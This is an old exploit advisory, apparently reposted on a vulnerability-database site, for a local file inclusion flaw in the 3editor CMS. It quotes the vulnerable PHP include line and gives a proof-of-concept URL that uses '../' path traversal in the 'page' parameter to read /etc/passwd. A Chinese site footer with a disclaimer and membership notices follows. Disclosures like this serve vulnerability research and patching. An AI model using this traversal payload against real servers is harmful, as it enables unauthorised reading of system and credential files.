************************************************************************ *script Name: 3editor CMS (index.php) Local File Include Exploit * *Download:http://www.matteolucarelli.net/3editor/index.htm * *[Author : Dr Max Virus * *[Contact :drmaxvirus@w.cn * ************************************************************************ *Bug & Problem * *In file index.php Let's Take a look; * *if (!isset($_GET['page'])) include('phplib/treeedit.php'); * *else include('phplib/'.$_GET['page']); * ************************************************************************ *As We can see the variable of page is not sanitized So attacker can * *apply his bug when: * *register_globals=on * ************************************************************************ *POC Example: * *http://[target]/[path]/index.php?page=../../../../../etc/passwd * ************************************************************************ *Thx:str0ke -koray -ajann -Timq -r0ut3r -All my Friends * *special gr33ts:AsianEagle -The master -Kacper -Hotturk * ************************************************************************ # milw0rm.com [2006-12-22]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论